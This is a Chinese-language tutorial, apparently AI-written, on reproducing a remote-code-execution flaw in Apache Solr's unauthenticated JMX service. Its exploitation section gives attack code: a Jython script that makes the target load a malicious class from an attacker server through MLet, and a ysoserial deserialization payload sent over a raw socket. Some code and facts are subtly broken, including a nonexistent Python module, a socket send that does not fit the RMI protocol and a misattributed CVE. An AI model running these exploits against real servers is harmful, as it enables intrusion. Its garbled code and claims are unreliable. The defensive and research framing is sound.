如何進行Apache Solr JMX服務RCE漏洞復現

# 如何進行Apache Solr JMX服務RCE漏洞復現

## 漏洞背景

Apache Solr是一個基于Lucene構建的開源企業級搜索平臺。在特定版本中，Solr的JMX（Java Management Extensions）服務存在配置缺陷，可能導致遠程代碼執行（RCE）。該漏洞通常出現在以下場景：

- Solr啟用JMX服務且未配置安全策略
- 攻擊者能夠訪問Solr的JMX端口（默認1099）
- 使用Java版本存在反序列化漏洞

## 環境準備

### 漏洞環境搭建

1. 下載存在漏洞的Solr版本（如5.0.0 - 8.11.0）：
   ```bash
   wget https://archive.apache.org/dist/solr/solr/8.11.0/solr-8.11.0.tgz
   tar -xvf solr-8.11.0.tgz

1. 啟動Solr并啟用JMX：

   
   cd solr-8.11.0/bin
   ./solr start -c -a "-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false"
   

工具準備

• Jython Exploit：用于通過JMX執行Python代碼
• ysoserial：Java反序列化利用工具
• nmap：端口掃描工具
• Burp Suite：流量分析工具

漏洞驗證

步驟1：檢測JMX服務開放

nmap -sV -p 1099 目標IP

若返回類似以下結果，則JMX服務可能開放：

1099/tcp open  rmiregistry Java RMI

步驟2：使用jconsole驗證連接

1. 運行jconsole
2. 輸入遠程進程地址：service:jmx:rmi:///jndi/rmi://目標IP:1099/jmxrmi
3. 若無需認證即可連接，則存在風險

漏洞利用

方法1：通過Jython執行命令

import javax.management as jmx
import jmxremote as jmxr

conn = jmxr.JMXConnectorFactory.connect(
    jmxr.JMXServiceURL("service:jmx:rmi:///jndi/rmi://目標IP:1099/jmxrmi")
)
mbs = conn.getMBeanServerConnection()

# 創建MBean
mbs.createMBean("javax.management.loading.MLet", None)

# 加載惡意class
mbs.invoke(
    jmx.ObjectName("javax.management.loading:type=MLet"),
    "getMBeansFromURL",
    ["http://攻擊者服務器/惡意.mlet"]
)

方法2：使用ysoserial進行反序列化攻擊

1. 生成惡意序列化數據：

   java -jar ysoserial.jar CommonsCollections5 "touch /tmp/pwned" > payload.ser
   

2. 通過JMX發送payload： “`python import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((“目標IP”, 1099)) with open(“payload.ser”, “rb”) as f: s.send(f.read()) s.close()

## 防御措施

### 臨時解決方案

1. 禁用JMX遠程訪問：
   ```bash
   ./solr start -a "-Dcom.sun.management.jmxremote=false"

1. 啟用JMX認證：

   
   ./solr start -a "-Dcom.sun.management.jmxremote.authenticate=true -Dcom.sun.management.jmxremote.password.file=/path/to/jmx.password -Dcom.sun.management.jmxremote.access.file=/path/to/jmx.access"
   

長期解決方案

1. 升級到最新版Solr
2. 配置網絡防火墻策略，限制JMX端口訪問
3. 使用SSL加密JMX通信

漏洞分析

技術原理

該漏洞的核心問題是： 1. 不安全的默認配置：Solr默認JMX配置允許匿名訪問 2. Java反序列化缺陷：JMX服務可能處理惡意序列化對象 3. MBean注入：通過MLet加載遠程惡意類

影響范圍

• 受影響版本：Solr 5.0.0至8.11.0
• Java版本影響：JDK 1.7.0_21之前、1.8.0_31之前存在更多可利用鏈

復現注意事項

1. 法律合規：僅在授權環境下測試
2. 環境隔離：使用虛擬機或容器環境
3. 日志監控：復現時觀察Solr日志：

   
   tail -f server/logs/solr.log
   

4. 影響控制：避免使用破壞性命令（如rm -rf）

擴展知識

JMX安全最佳實踐

1. 始終啟用認證：

   
   com.sun.management.jmxremote.authenticate=true
   

2. 使用強密碼策略
3. 結合SSL使用：

   
   com.sun.management.jmxremote.ssl=true
   

相關CVE

• CVE-2016-3427：Java JMX組件漏洞
• CVE-2017-12629：Solr JMX配置問題

參考資源

1. Apache Solr官方安全公告
2. Oracle JMX安全指南
3. ysoserial項目

注意：本文僅用于安全研究目的，未經授權對他人系統進行測試屬于違法行為。實際漏洞利用可能因環境差異需要調整方法。 “`

這篇文章提供了約1500字的詳細復現指南，包含： - 漏洞背景和技術原理 - 分步驟的復現過程 - 多種利用方法 - 防御建議 - 注意事項和擴展知識

格式采用Markdown標準語法，包含代碼塊、列表、標題等元素，可直接用于技術文檔發布。